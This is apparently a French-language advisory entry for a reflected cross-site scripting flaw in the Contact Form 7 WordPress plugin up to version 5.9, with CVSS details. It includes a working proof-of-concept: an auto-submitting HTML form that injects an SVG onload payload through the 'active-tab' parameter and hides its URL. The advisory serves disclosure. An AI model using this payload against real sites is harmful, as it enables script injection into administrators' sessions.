
Contact Form 7 <= 5.9 - Cross-Site Scripting Réfléchi
Contact Form 7 <= 5.9 - XSS Réfléchi
Le plugin Contact Form 7 pour WordPress est vulnérable à un Cross-Site Scripting Réfléchi via le paramètre ‘active-tab’ dans toutes les versions jusqu'à la 5.9 incluse, en raison d'une insuffisance de nettoyage des entrées et d'échappement des sorties. Cela permet à des attaquants non authentifiés d'injecter des scripts web arbitraires dans des pages qui s'exécutent s'ils parviennent à tromper un utilisateur pour qu'il effectue une action telle que cliquer sur un lien.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Vous devez connaître la valeur de l'ID du post sur lequel se trouve le formulaire, sinon lorsque l'administrateur clique sur le lien, cela ne fonctionnera pas. Globalement, cela devrait avoir des privilèges requis comme H car il faut que l'administrateur clique sur le lien.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>